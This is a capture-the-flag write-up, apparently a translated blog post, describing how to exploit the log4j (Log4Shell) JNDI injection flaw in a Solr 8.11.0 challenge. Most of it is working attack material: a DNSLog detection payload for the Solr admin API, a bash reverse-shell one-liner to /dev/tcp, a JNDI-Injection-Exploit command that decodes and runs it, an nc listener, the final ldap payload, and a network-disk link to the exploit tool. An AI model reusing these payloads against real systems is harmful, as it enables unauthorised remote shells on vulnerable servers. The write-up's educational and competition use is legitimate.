Article directory
foreword
There was a problem in the competition. I found that there was a log4j vulnerability, but I needed to rebound the shell to get the flag. I tried several tools at the beginning but failed to rebound the shell. Until I saw this excellent blog post, I would like to thank this master~ I will record it in this
article The process of log4j rebounding shell is only for your reference~
Go farther and see a brighter light
tool
I tested some tools and found that this one is easier to use. You can download it directly from github or download girhub from my network disk
: JNDI-Injection-Exploit-1.0-SNAPSHOT-all
Network disk link: https://pan.baidu.com /s/13cz9sZzMJcF9s1y7E7sOWw
Extraction code: qwer
Log4j Vulnerability Test
The topic gives a solr environment. You can see the version 8.11.0 on the homepage.
Obtain a domain name from DNSLog
. Test whether the log4j vulnerability exists through the solr API. The specific payload is as follows:
/solr/admin/cores?action=${
jndi:ldap://${
sys:java.version}.jprd1u.dnslog.cn}
Successfully echoed on the DNSlog platform
So far, it can be inferred that there is a log4j vulnerability in the target environment
Log4j reverse shell
Next, you need to use the above tools and a public network server. First, upload the tools and base64-encode the rebound shell commands:
bash -i >& /dev/tcp/your_ip/6666 0>&1
Use the base64 online website to encode and fill in the following command, and also need to fill in the IP address of the server
Execute the following command:
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,base64编码}|{base64,-d}|{bash,-i}" -A "服务器IP"
Next, start listening on the server. I use port 5555 here.
nc -lvp 5555
Select the payload according to the target environment as follows:
${
jndi:ldap://IP:1389/2u3m9p}
Test with payload
Successfully rebound the shell
postscript
If you have any other questions, please leave a comment~